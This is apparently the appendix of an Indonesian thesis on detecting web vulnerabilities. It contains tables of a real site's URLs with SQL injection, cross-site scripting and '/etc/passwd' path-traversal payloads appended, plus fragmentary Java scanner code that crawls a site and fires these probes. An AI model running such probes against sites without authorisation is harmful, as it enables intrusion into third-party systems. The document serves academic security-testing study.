Pendeteksi Celah Keamanan pada Aplikasi WEB dengan Penerapan Testing Menggunakan Data Validation Testing
LAMPIRAN A : Tabel
1. Tabel 4.7 Hasil crawling sampel 1 No. Daftar URL website 1 http://www.raahauges.com /index.php 2 http://www.raahauges.com /supporters.php 3 http://www.raahauges.com /shotgun-range.php 4 http://www.raahauges.com /hunting.php 5 http://www.raahauges.com /sports-fair.php 6 http://www.raahauges.com /events-calendar.php 7 http://www.raahauges.com /contact.php 8 http://www.raahauges.com /news.php 9 http://www.raahauges.com /shoot-results.php 10 http://www.raahauges.com /find-raahauges.php
11 http://www.raahauges.com /view-news.php?id=9 12 http://www.raahauges.com /view-news.php?id=8 13 http://www.raahauges.com /view-news.php?id=10 14 http://www.raahauges.com /SportsFairFlyer2014.pdf
15 http://www.raahauges.com /index.php?prm=09&chm=-1#mini-calendar
16 http://www.raahauges.com /index.php?prm=09&chm=1#mini-calendar
17 http://www.raahauges.com /events-calendar.php?d=2014-09-13 18 http://www.raahauges.com /events-calendar.php?d=2014-09-14 19 http://www.raahauges.com /events-calendar.php?d=2014-09-17 20 http://www.raahauges.com /events-calendar.php?d=2014-09-18 21 http://www.raahauges.com /events-calendar.php?d=2014-09-19 22 http://www.raahauges.com /events-calendar.php?d=2014-09-20 23 http://www.raahauges.com /events-calendar.php?d=2014-09-21 24 http://www.raahauges.com /events-calendar.php?d=2014-09-282. Tabel 4.8 Hasil skenario penyerangan SQL Injection sampel 1 3.
No. Daftar URL website yang telah dimanipulasi 1 http://www.raahauges.com /index.php%27 2 http://www.raahauges.com /supporters.php%27 3 http://www.raahauges.com /shotgun-range.php%27 4 http://www.raahauges.com /hunting.php%27 5 http://www.raahauges.com /sports-fair.php%27 6 http://www.raahauges.com /events-calendar.php%27 7 http://www.raahauges.com /contact.php%27 8 http://www.raahauges.com /news.php%27 9 http://www.raahauges.com /shoot-results.php%27 10 http://www.raahauges.com /find-raahauges.php%27
11 http://www.raahauges.com /view-news.php?id=9%27 12 http://www.raahauges.com /view-news.php?id=8%27 13 http://www.raahauges.com /view-news.php?id=10%27 14 http://www.raahauges.com /SportsFairFlyer2014.pdf%27 15 http://www.raahauges.com /index.php?prm=09&chm=-1#mini- calendar%27 16 http://www.raahauges.com /index.php?prm=09&chm=1#mini- calendar%27 17 http://www.raahauges.com /events-calendar.php?d=2014-09-13%27 18 http://www.raahauges.com /events-calendar.php?d=2014-09-14%27 19 http://www.raahauges.com /events-calendar.php?d=2014-09-17%27 20 http://www.raahauges.com /events-calendar.php?d=2014-09-18%27 21 http://www.raahauges.com /events-calendar.php?d=2014-09-19%27 22 http://www.raahauges.com /events-calendar.php?d=2014-09-20%27 23 http://www.raahauges.com /events-calendar.php?d=2014-09-21%27 24 http://www.raahauges.com /events-calendar.php?d=2014-09-28%27
3. Tabel 4.9 Hasil skenario penyerangan Cross Site Scripting sampel 1 No. Daftar URL website yang telah dimanipulasi
1 http://www.raahauges.com /index.php%20%27%3E%3C%68%31%3E%54
%65%73%74%69%6E%67%3C%2F%68%31%3E2 http://www.raahauges.com /supporters.php%20%27%3E%3C%68%31%3E
%54%65%73%74%69%6E%67%3C%2F%68%31%3E 3 http://www.raahauges.com /shotgun- range.php%20%27%3E%3C%68%31%3E%54%65%73%74%69%6E%67%3C%2F%68%31%3E
4 http://www.raahauges.com /hunting.php%20%27%3E%3C%68%31%3E%5
4%65%73%74%69%6E%67%3C%2F%68%31%3E 5 http://www.raahauges.com /sports- fair.php%20%27%3E%3C%68%31%3E%54%65%73%74%69%6E%67%3 C%2F%68%31%3E6 http://www.raahauges.com /events- calendar.php%20%27%3E%3C%68%31%3E%54%65%73%74%69%6E% 67%3C%2F%68%31%3E
7 http://www.raahauges.com /contact.php%20%27%3E%3C%68%31%3E%5
4%65%73%74%69%6E%67%3C%2F%68%31%3E8 http://www.raahauges.com /news.php%20%27%3E%3C%68%31%3E%54
%65%73%74%69%6E%67%3C%2F%68%31%3E 9 http://www.raahauges.com /shoot- results.php%20%27%3E%3C%68%31%3E%54%65%73%74%69%6E%67 %3C%2F%68%31%3E10 http://www.raahauges.com /find- raahauges.php%20%27%3E%3C%68%31%3E%54%65%73%74%69%6E %67%3C%2F%68%31%3E 11 http://www.raahauges.com /view- news.php?id=9%20%27%3E%3C%68%31%3E%54%65%73%74%69%6E %67%3C%2F%68%31%3E
4. Tabel 4.9 Hasil skenario penyerangan Cross Site Scripting sampel 1 No. Daftar URL website yang telah dimanipulasi
12 http://www.raahauges.com /view- news.php?id=8%20%27%3E%3C%68%31%3E%54%65%73%74%69%6E %67%3C%2F%68%31%3E 13 http://www.raahauges.com /view- news.php?id=10%20%27%3E%3C%68%31%3E%54%65%73%74%69%6 E%67%3C%2F%68%31%3E
14 http://www.raahauges.com /SportsFairFlyer2014.pdf%20%27%3E%3C%68
%31%3E%54%65%73%74%69%6E%67%3C%2F%68%31%3E
15 http://www.raahauges.com /index.php?prm=09&chm=-1#mini- calendar%20%27%3E%3C%68%31%3E%54%65%73%74%69%6E%67%3C%2F%68%31%3E 16 http://www.raahauges.com /index.php?prm=09&chm=1#mini- calendar%20%27%3E%3C%68%31%3E%54%65%73%74%69%6E%67%
3C%2F%68%31%3E 17 http://www.raahauges.com /events-calendar.php?d=2014-09- 13%20%27%3E%3C%68%31%3E%54%65%73%74%69%6E%67%3C%2 F%68%31%3E
18 http://www.raahauges.com /events-calendar.php?d=2014-09- 14%20%27%3E%3C%68%31%3E%54%65%73%74%69%6E%67%3C%2 F%68%31%3E 19 http://www.raahauges.com /events-calendar.php?d=2014-09- 17%20%27%3E%3C%68%31%3E%54%65%73%74%69%6E%67%3C%2 F%68%31%3E
20 http://www.raahauges.com /events-calendar.php?d=2014-09- 18%20%27%3E%3C%68%31%3E%54%65%73%74%69%6E%67%3C%2 F%68%31%3E 21 http://www.raahauges.com /events-calendar.php?d=2014-09- 19%20%27%3E%3C%68%31%3E%54%65%73%74%69%6E%67%3C%2 F%68%31%3E
5. Tabel 4.9 Hasil skenario penyerangan Cross Site Scripting sampel 1 No. Daftar URL website yang telah dimanipulasi
22 http://www.raahauges.com /events-calendar.php?d=2014-09- 20%20%27%3E%3C%68%31%3E%54%65%73%74%69%6E%67%3C%2 F%68%31%3E 23 http://www.raahauges.com /events-calendar.php?d=2014-09- 21%20%27%3E%3C%68%31%3E%54%65%73%74%69%6E%67%3C%2 F%68%31%3E
24 http://www.raahauges.com /events-calendar.php?d=2014-09- 28%20%27%3E%3C%68%31%3E%54%65%73%74%69%6E%67%3C%2
F%68%31%3E 6.
Tabel 4.10 Hasil skenario penyerangan File Inclusion sampel 1 No. Daftar URL website yang telah dimanipulasi1 http://www.raahauges.com /index.php../../../../../../../../../../etc/passwd 2 http://www.raahauges.com /supporters.php../../../../../../../../../../etc/passwd 3 http://www.raahauges.com /shotgun-range.php../../../../../../../../../../etc/passwd 4 http://www.raahauges.com /hunting.php../../../../../../../../../../etc/passwd 5 http://www.raahauges.com /sports-fair.php../../../../../../../../../../etc/passwd
6 http://www.raahauges.com /events-calendar.php../../../../../../../../../../etc/passwd
7 http://www.raahauges.com /contact.php../../../../../../../../../../etc/passwd 8 http://www.raahauges.com /news.php../../../../../../../../../../etc/passwd 9 http://www.raahauges.com /shoot-results.php../../../../../../../../../../etc/passwd7. Tabel 4.10 Hasil skenario penyerangan File Inclusion sampel No. Daftar URL website yang telah dimanipulasi
10 http://www.raahauges.com /find-raahauges.php../../../../../../../../../../etc/passwd
11 http://www.raahauges.com /view-news.php?id=9../../../../../../../../../../etc/passwd
12 http://www.raahauges.com /view-news.php?id=8../../../../../../../../../../etc/passwd
13 http://www.raahauges.com /view-news.php?id=1014 http://www.raahauges.com /SportsFairFlyer2014.pdf../../../../../../../../../../etc/pass
wd 15 http://www.raahauges.com /index.php?prm=09&chm=-1#mini- calendar../../../../../../../../../../etc/passwd 16 http://www.raahauges.com /index.php?prm=09&chm=1#mini- calendar../../../../../../../../../../etc/passwd 17 http://www.raahauges.com /events-calendar.php?d=2014-09- 13../../../../../../../../../../etc/passwd 18 http://www.raahauges.com /events-calendar.php?d=2014-09- 14../../../../../../../../../../etc/passwd 19 http://www.raahauges.com /events-calendar.php?d=2014-09- 17../../../../../../../../../../etc/passwd 20 http://www.raahauges.com /events-calendar.php?d=2014-09- 18../../../../../../../../../../etc/passwd 21 http://www.raahauges.com /events-calendar.php?d=2014-09- 19../../../../../../../../../../etc/passwd 22 http://www.raahauges.com /events-calendar.php?d=2014-09- 20../../../../../../../../../../etc/passwd 23 http://www.raahauges.com /events-calendar.php?d=2014-09- 21../../../../../../../../../../etc/passwd 24 http://www.raahauges.com /events-calendar.php?d=2014-09- 28../../../../../../../../../../etc/passwd
LAMPIRAN B: Potongan Source Code Aplikasi
1. AutoScanner SQLi.java
import java.net.URL; import java.util.ArrayList; import java.util.logging.Level; import java.util.logging.Logger; import java.util.regex.Matcher; import java.util.regex.Pattern; import javax.swing.JOptionPane; import org.jsoup.Jsoup; public class AutoScannerSQLI extends javax.swing.JFrame { private String save[]= new String [250]; private String testBasic=""; private String testBlind=""; private String testBlind2=""; private int hasilPencarian=0; private String inputURL=""; ArrayList< String > listOfReportsVulnerable = new ArrayList< String >(); ArrayList< String > listOfReports = new ArrayList< String >(); read_byPassHttpError identifikasi = new read_byPassHttpError(null); public AutoScannerSQLI() { initComponents(); } private void ScanActionPerformed(java.awt.event.ActionEvent evt) { hasilScanSQLi.setText(""); hasilPencarian=0; for(int i=0; i<=save.length-1;i++){ save[i]=null; } listOfReportsVulnerable = new ArrayList< String >(0); listOfReports = new ArrayList< String >(0); inputURL= url_Site.getText(); String typeAttack = tipeSerangan.getSelectedItem().toString(); //Cek penulisan URL if ((verifyUrl(inputURL) != null)&&(typeAttack!=null)){ JOptionPane.showMessageDialog(null,"Scan Mulai"); hasilScanSQLi.append("Situs yang di scan "+ inputURL+" \n"); hasilScanSQLi.append("Jenis Serangan SQL Injection \n"+"tipe serangan : "+ typeAttack +"\n"); listOfReportsVulnerable.add("Tipe serangan : "+ typeAttack +"\n"); } else { JOptionPane.showMessageDialog(null,"The entered URL is not valid. Please enter again:"); url_Site.requestFocus(); } //Mulai tahap penetration Testing websiteCrawler(inputURL); if(typeAttack.equals("Basic Injection")){ attackScenarioBasic("%27");
} else if(typeAttack.equals("Blind Injection")){ //True Attack attackScenarioBlindTrue(); //False Attack //attackScenarioBlindFalse("%20and%201=0--"); } } public void websiteCrawler(String url){ Document doc; try { // need http protocol doc = Jsoup.connect(url).timeout(5000) .ignoreHttpErrors(true).followRedirects(true).userAgent("Mozilla").get();
// get page title String title = doc.title();
// get all links Elements links = doc.select("a[href]"); int i=0; for (Element link : links) { if(link.attr("abs:href").contains(url)){ save[i]=link.attr("abs:href"); i++; }}
} catch (IOException e) {e.printStackTrace();} } private void attackScenarioBasic(String serangan){ for(int i=0; i<save.length-1;i++){ if(save[i]!=null){ testBasic=save[i]+serangan; readResponAttack(testBasic); } else{ break; } } //Fungsi ATTAck Scenario Blind Sql Injection private void attackScenarioBlindTrue(){ String serangan1="%20and%201=1--"; String serangan2="%20and%201=0--"; int size1=0, size2=0; for(int i=0; i<save.length-1;i++){ if(save[i]!=null){ testBlind=save[i]+serangan1; identifikasi.byPassError(testBlind); hasilIdentifikasiTrue=identifikasi.hasilRead; size1=identifikasi.size; testBlind2=save[i]+serangan2; identifikasi.byPassError(testBlind2); hasilIdentifikasiFalse=identifikasi.hasilRead; size2=identifikasi.size; if((hasilIdentifikasiTrue.equals(hasilIdentifikasiFalse))||(size1==size2)){ hasilScanSQLi.append(save[i]+" => "+"Tidak Vulnerable\n"); listOfReportsVulnerable.add(save[i]+" => "+"Tidak Vulnerable\n"); } else { hasilScanSQLi.append(save[i]+" => "+" Vulnerable\n");
listOfReportsVulnerable.add(save[i]+" => "+"Vulnerable"); hasilPencarian+=1; listOfReports.add(save[i]+" => "+"Vulnerable"); } } else break; } } private void attackScenarioBlindFalse(String serangan){ for(int i=0; i<save.length-1;i++){ if(save[i]!=null){ testBlind=save[i]+serangan; try { identifikasi.byPassError(testBlind); if(hasilIdentifikasiTrue.equals(hasilIdentifikasiFalse)){ hasilScanSQLi.append(testBlind+" => "+"Tidak Vulnerable\n"); } else { hasilScanSQLi.append(testBlind+" => "+" Vulnerable\n"); } } catch (Exception ex) { Logger.getLogger(AutoScannerSQLI.class.getName()).log(Level.SEVERE, null, ex); } hasilIdentifikasiFalse=identifikasi.hasilRead; } else break; } } //Fungsi fingerprinting -> untuk membaca back end dari database server //Analisis respon yang diberikan untuk menemukan apakah rentan diserang atau tidak private void readResponAttack(String SQLTest){ Document doc; try {
// need http protocol doc =Jsoup.connect(SQLTest).timeout(3000) .ignoreHttpErrors(true).followRedirects(true) .userAgent("Mozilla").get();
// get page title String title = doc.title(); System.out.println("title : " + title);
Elements links = doc.select("a[href]"); System.out.println("\nlink : " + links.attr("abs:href")); String isi = doc.body().text(); Pattern p =Pattern.compile("error SQL|You have an error in your SQL syntax"); Matcher m = p.matcher(isi); int start =0; if(m.find(0)){ hasilScanSQLi.append(SQLTest+" => "+"Vulnerable\n"); listOfReportsVulnerable.add(SQLTest+" => "+"Vulnerable\n"); listOfReports.add(SQLTest+" => "+"Vulnerable\n"); hasilPencarian+=1; } else { hasilScanSQLi.append(SQLTest+" => "+"Tidak Vulnerable\n"); listOfReportsVulnerable.add(SQLTest+" => "+"Tidak Vulnerable\n"); } } catch (IOException e) {e.printStackTrace(); } }
2. AutoScannerXSS.java
import java.net.URL; import java.util.ArrayList; import java.util.logging.Level; import java.util.logging.Logger; import java.util.regex.Matcher; import java.util.regex.Pattern; import javax.swing.JOptionPane; import org.jsoup.Jsoup; public class AutoScannerXSS extends javax.swing.JFrame { private String listUrlXSS []= new String [250]; private String hasilRead=""; private String tipeAttack=""; private int hasilPencarian=0; ArrayList< String > listOfReportsVulnerable = new ArrayList< String >(); ArrayList< String > listOfReports = new ArrayList< String >();} public AutoScannerXSS() { initComponents(); } private void scanXSSActionPerformed(java.awt.event.ActionEvent evt) { String situs =urlXSS.getText(); tipeAttack = tipeXSS.getSelectedItem().toString(); hasilXSS.setText(null); hasilPencarian=0; listOfReportsVulnerable = new ArrayList< String >(0); listOfReports = new ArrayList< String >(0); //inisialisasi list menampung url kosong for(int i=0; i<listUrlXSS.length-1;i++){ listUrlXSS[i]=null; } if ((verifyUrl(situs) != null)&&(tipeAttack!=null)){ JOptionPane.showMessageDialog(null,"Scan Mulai"); hasilXSS.append("Situs yang di scan "+ situs+" \n"); hasilXSS.append("Jenis Serangan CRoss Site Scripting \n"+ "tipe serangan : "+ tipeAttack +"\n"); //listOfReportsVulnerable.add("Tipe serangan : "+ "<!-->"+tipeAttack +" <!-->"
- +"\n"); listOfReportsVulnerable.add("List status URL " +"\n"); // hasilXSS.append(site); } else { JOptionPane.showMessageDialog(null,"The entered URL is not valid. Please enter again:"); urlXSS.requestFocus(); } websiteCrawler(situs); //attack
if(tipeAttack.equals("<h1>Testing</h1>")){ attackScenarioXSS("%20<h1>Testing</h1>"); } else if(tipeAttack.equals("'><h1>Testing</h1>")) {
attackScenarioXSS("%20%27%3E%3C%68%31%3E%54%65%73%74%69%6E%67%3C%2 F%68%31%3E"); } else if(tipeAttack.equals("<script>alert(123)</script>")) { attackScenarioXSS("%20<script>alert(123)</script>"); } else if(tipeAttack.equals("'<script>alert(123);</script>")) { attackScenarioXSS("%20'<script>alert(123);</script>"); } } private void attackScenarioXSS(String serangan){ for( int i=0; i<listUrlXSS.length-1;i++){ if(listUrlXSS[i]!=null){ // String testXSS=listUrlXSS[i]+serangan; // listUrlXSS2[i]=listUrlXSS[i]+serangan; // readResponAttack(testXSS); byPassError(listUrlXSS[i],serangan); } else break; } } private void readResponAttack(String SQLTest){ Document doc try {// need http protocol doc = Jsoup.connect(SQLTest).timeout(5000) .ignoreHttpErrors(true).followRedirects(true) .userAgent("Mozilla").get(); // get page title
String title = doc.title(); System.out.println("title : " + title);
String isi = doc.body().text(); Pattern p =Pattern.compile(tipeAttack); Matcher m = p.matcher(isi); int start =0; while(m.find(start)){ System.out.println("Match Found \n"+ m.group(1)+ "at position "+m.start()); start= m.end(); System.out.println("Testing : "+m.find(0)); if( m.find(0)){ hasilXSS.append(" Vulnerable"); } else { hasilXSS.append("NO Vulnerable"); } } } catch (IOException e) {e.printStackTrace();} }
3. AutoScannerFileInclusion.java
import java.net.URL; import java.util.ArrayList; import java.util.logging.Level; import java.util.logging.Logger; import java.util.regex.Matcher; import java.util.regex.Pattern; import javax.swing.JOptionPane; import org.jsoup.Jsoup; public class AutoScannerFileInclusion extends javax.swing.JFrame { private String listUrl[]= new String [250]; private String inputURL=""; private int hasilPencarian=0; ArrayList< String > listOfReportsVulnerable = new ArrayList< String >(); ArrayList< String > listOfReports = new ArrayList< String >(); public AutoScannerFileInclusion() { initComponents(); } private void ScanActionPerformed(java.awt.event.ActionEvent evt) { hasilScan.setText(null); //Inisialisasi daftar url ke 0 for(int i=0; i<=listUrl.length-1;i++){ listUrl[i]=null; } listOfReportsVulnerable = new ArrayList< String >(0); listOfReports = new ArrayList< String >(0); inputURL= url_Site.getText(); String serangan= tipeSerangan.getSelectedItem().toString(); if ((verifyUrl(inputURL) != null)&&(serangan!=null)){ JOptionPane.showMessageDialog(null,"Scan Mulai"); hasilScan.append("Situs yang di scan "+ inputURL+" \n"); hasilScan.append("Jenis Serangan File Inclusion \n"+"Tipe serangan : "+ serangan
- +"\n"); } else { JOptionPane.showMessageDialog(null,"The entered URL is not valid. Please enter again:"); url_Site.requestFocus(); } websiteCrawler(inputURL); //Fase Attack if(serangan.equals("File Inclusion")){ attackScenarioFileInclusion("../"); tampil(); }
else if(serangan.equals("File Inclusion with Null")){ attackScenarioFileInclusion("../%00"); } } public void websiteCrawler(String url){ Document doc; try {
// need http protocol doc = Jsoup.connect(url).timeout(50000)
.ignoreHttpErrors(true).followRedirects(true) .userAgent("Mozilla").get();
// get page title String title = doc.title(); //System.out.println("title : " + title); // get all links Elements links = doc.select("a[href]"); int i=0; for (Element link : links) {
// System.out.println("\nlink : " + link.attr("abs:href")); if(link.attr("abs:href").contains(url)){ listUrl[i]=link.attr("abs:href"); i++; }
} } catch (IOException e) { e.printStackTrace();
} } //Attack Skenario (Data Validation Testing) private void attackScenarioFileInclusion(String serangan){ for( int i=0; i<listUrl.length-1;i++){ if(listUrl[i]!=null){ String testFileInclusion=listUrl[i]; byPassError(testFileInclusion,serangan); } else break; } } //Finger Printing back end respon create by INdra Nababan public void byPassError(String url,String serangan) { int size=0; String s=null; s=url+serangan; BufferedReader in=null; try {URL obj = new URL(s); HttpURLConnection conn = (HttpURLConnection) obj.openConnection(); conn.setReadTimeout(0); conn.setRequestProperty("User-Agent","Mozilla/5.0 ( compatible ) "); conn.setRequestProperty("Accept","*/*"); System.out.println("Request URL ... " +s); boolean redirect = false; // normally, 3xx is redirect int status = conn.getResponseCode(); if (status != HttpURLConnection.HTTP_OK) { if (status == HttpURLConnection.HTTP_MOVED_TEMP || status == HttpURLConnection.HTTP_MOVED_PERM || status == HttpURLConnection.HTTP_SEE_OTHER) redirect = true;
} System.out.println("Response Code ... " + status); if (redirect) {
// get redirect url from "location" header field String newUrl = conn.getHeaderField("Location"); // get the cookie if need, for login String cookies = conn.getHeaderField("Set-Cookie"); // open the new connnection again conn = (HttpURLConnection) new
URL(newUrl).openConnection(); conn.setRequestProperty("Cookie", cookies); conn.setRequestProperty("User-Agent","Mozilla/5.0
( compatible ) "); conn.setRequestProperty("Accept","*/*"); System.out.println("Redirect to URL : " + newUrl); } boolean isError = conn.getResponseCode() >= 400;
//The normal input stream doesn't work in error-cases. //is = isError ? con.getErrorStream() : con.getInputStream(); if(isError){ in = new BufferedReader( new InputStreamReader(conn.getErrorStream())); } else{ in = new BufferedReader( new InputStreamReader(obj.openStream())); }
String inputLine; StringBuffer html = new StringBuffer(); while ((inputLine = in.readLine()) != null) { html.append(inputLine+"\n"); } in.close();
String hasil=html.toString(); Pattern p =Pattern.compile("<b>Warning</b>"); Matcher m = p.matcher(hasil); String test=""; int start =0; if(m.find(0)){ hasilScan.append(s+" => "+"VULNERABLE"+"\n"); listOfReportsVulnerable.add(url+" => "+"VULNERABLE"+"\n"); listOfReports.add(url+" => "+"VULNERABLE"+"\n"); hasilPencarian+=1; } else { hasilScan.append(s+" => "+"Not Vulnerable\n"); listOfReports.add(url+" => "+"Not VULNERABLE"+"\n"); } } catch (Exception e) { e.printStackTrace(); } }